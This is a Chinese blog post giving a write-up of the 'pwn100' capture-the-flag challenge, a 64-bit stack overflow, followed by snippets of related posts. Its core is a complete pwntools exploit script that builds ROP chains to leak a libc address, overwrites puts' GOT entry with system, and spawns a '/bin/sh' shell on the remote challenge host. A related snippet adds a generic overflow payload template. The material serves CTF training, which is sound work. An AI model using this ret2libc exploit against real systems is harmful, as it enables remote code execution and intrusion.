pwn100

最新推荐文章于 2025-08-17 03:25:58 发布
原创 最新推荐文章于 2025-08-17 03:25:58 发布 · 344 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了在解决一道64位pwn题目时,利用Return-Oriented Programming(ROP)技术。重点在于64位环境下,由于参数传递方式的不同,需要将函数参数放入寄存器中再进行调用。而在32位或特定环境下,这一过程可能不同。

这是一道64位的题,用rop来最终解决
exp如下:

#coding:utf-8
from pwn import *
from LibcSearcher import *

io=remote('111.198.29.45',5)

readn = 0x40063D
start = 0x40068E
read_got = 0x601028
put_plt = 0x400500
put_got = 0x601018
length = 0x40
max_length = 200
bss = 0x601040

pop_rdi = 0x0000000000400763
pop_rsi_r15 = 0x0000000000400761

def stageone():
    payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(read_got) \
	+p64(put_plt)+p64(pop_rdi)+p64(bss) \
	+p64(pop_rsi_r15)+p64(7)+p64(0)+p64(readn)+p64(start)
    payload += "A"*(max_length-len(payload))
    io.send(payload)
    sleep(1)
    io.send("/bin/sh")
    print io.recvuntil("bye~")
    return u64(io.recv()[1:-1].ljust(8,'\0'))

read_addr = stageone()
print "read address: ", hex(read_addr)

libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump("read")
system_addr = libc_base + libc.dump("system")
sys = p64(system_addr)
print "system address: ",hex(system_addr)

def stagetwo():
    payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(put_got) \
	+p64(pop_rsi_r15)+p64(len(sys))+p64(0)+p64(readn)+p64(pop_rdi)+p64(bss) \
	+p64(system_addr)+p64(start)
    payload += "A"*(max_length-len(payload))
    io.send(payload)
    print io.recv()
    io.send(sys)
    

stagetwo()
io.interactive()

梳理一下收获,在用pop|ret然后调用函数时,由于64位6参数一下采用放在寄存器的方法,则参数也需要放在寄存里面再进行调用,如果是32位或者在bss段(bss应该是这样)执行则无需。

gone too soon
关注
pwn-100(xctf)
weixin_43868725的博客
05-24 493
0x0 程序保护和流程 保护: 流程: main() sub_40068E() sub_40063D() 通过程序流程我们可以看出在sub_40068E()调用sub_40063D()时发生了栈溢出。 0x1 利用过程 1.这个程序没有system()函数,也没有"/bin/sh"。但是我们程序运行的时候需要libc。而libc中有我们需要的system(),所以我们只需要确定libc的基地址就可以知道system()。这里给出两种方法获取libc的基地址。第一种是pwntools自带的DynELF
攻防世界 Pwn pwn-100
MrTreebook的博客
12-12 736
攻防世界 Pwn pwn-1001.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 64程序,目前还什么都看不出看来,直接拉近IDA看看 3.IDA分析 整个程序由3个嵌套的程序组成 我们可以看到sub_40063D是主要的程序,接受单个字符并存储到传入的参数a1所指向的空间之内 同时分析sub_40068E发现sub_40063D中a1就是sub_40068E中的v1 并且v1的栈空间大小就只有0x40,而sub_4006
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3573
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
pwnpwn-100
醉等佳人归
09-06 537
1.题目 1.1.保护机制 没开canary和ASLR,只开了NX 1.2.关键代码 2.思路 很明显就是一个简单栈溢出漏洞,但是发现没有提供lib文件,导致我们不能直接去泄漏puts加载地址然后计算偏移得到system的地址,pwn库提供了一个通过泄漏地址遍历lib库 d = DynELF(leak,elf=elf) system_addr = d.lookup('system','libc') leak参数是一个函数,函数参数为地址,地址由DynELF提供,函数功能就是通过参数地址泄漏出该地址指
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 3168
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
pwn100题目文件及exp.zip
08-09
本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)竞赛题目,旨在帮助学习者了解和实践栈溢出漏洞的利用技巧。 栈溢出是由于程序在分配的栈空间之外写入数据,导致栈上的其他变量或返回地址被覆盖...
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
CTFshow-pwn入门-pwn100 WP
最新发布
Claire_cat的学习记录
08-17 2204
在栈上的第二个置,对于 printf 来说,rdi 是函数本身,第一个参数是 rsi,然后是 rdx、rcx、r8、r9,栈上第一个,栈上第二个的。原来正常返回的 main 函数某个地址和我们写入的后门地址都是在 elf 基址上计算的,高相同。这里还在找后面地址在栈上的置,所以这里的 1 是随便填的,hn 是写入两字节,对应地址后四。的第一个参数,在调用 printf 时,寄存器会存 printf 的参数,会暂时把在。个,加上寄存器上的 5 个和栈上的第 0 个,是格式化字符串的第 17 个参数,
攻防世界(Pwn) PWN100
半岛铁盒的博客
03-23 323
同时这里还存在一个 v1溢出点 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,如果多于6个参数才会用栈我们要先知道这个特性 这题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串,这题呢,我们可以利用put来泄露read函数的地址,然后再利用LibcSearcher查询可能的libc 这题ROP,我们先构造paylo
攻防世界pwn100 详细的WP
Zarcs_233的博客
01-20 967
pwn萌新做pwn题了 首先checksec shellcode肯定是行不通了 IDA打开看看 发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节 查看程序导入,发现没有system,查看string,发现没有’/bin/sh’ 所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢? 由于是64系统,所以得...
简单的练手栈溢出题 pwn100-附件资源
03-02
简单的练手栈溢出题 pwn100-附件资源
攻防世界 pwn-100
10-26 430
1 题目 2 分析 如上图,这道题很简单粗暴,直接暴露溢出点,但是需要注意的是,每次输入读200!这点下面会有坑。 思路:利用ROP泄露出read的地址,利用Libsearch获得system和/bin/sh的地址。这些都是常规流程。但是,有一点要注意,在发送payload的时候,一定不能使用sendline或者sendafterline。因为这两个方法会自动在你的payload后面添加\n。本题严格读取200单元,多出来的\n作为下次读取的开头,会导致第二次发送的错误!exp如下 f
pwn学习系列--任务3 pwn100
weixin_44113469的博客
01-31 698
pwn100解题步骤 1.先将pwn100 文件copy到虚拟机里,查看一波,文件是32的 2.ida里f5 查看main函数 查看buf大小64+4,但read可向buf读入0x100,可看出这是个栈溢出 3.找了老久,我勒个去,没有system函数,身为小白的我,一直纠结这是要干啥,我该怎么办。。。但有getflag函数,额----,flag.txt自己弄,flag文件记得写点东西,不...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 638
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
XCTF pwn-100
zwb2603096342的博客
05-21 749
XCTF pwn-100 典型的64ret2libc
[攻防世界 pwn]——pwn-100
Y_peak的博客
02-21 416
[攻防世界 pwn]——pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符, 不然不退出循环 思路 leek出来一个地址, 然后找到libc, 计算偏移找到system 和 ‘/bin/sh’ 循环调用, 得到shell from pwn import * from LibcSearcher import * #p = process("./pwn") p = remo
pwn100 ssp
Vccxx的博客
04-08 1207
ssp–利用栈溢出保护来泄露内存这payload贼短。。题目链接:sspStack-smashing Protection (SSP,又名 ProPolice),是在函数的栈底插入一个随机数,这个随机数在函数调用结束后会被检测,如果与预设的不同,就会直接退出程序并打印如下的错误提示: *** stack smashing detected ***: ./pwn100 terminated
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2606
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
攻防世界pwn pwn-100
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX但是禁用了置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值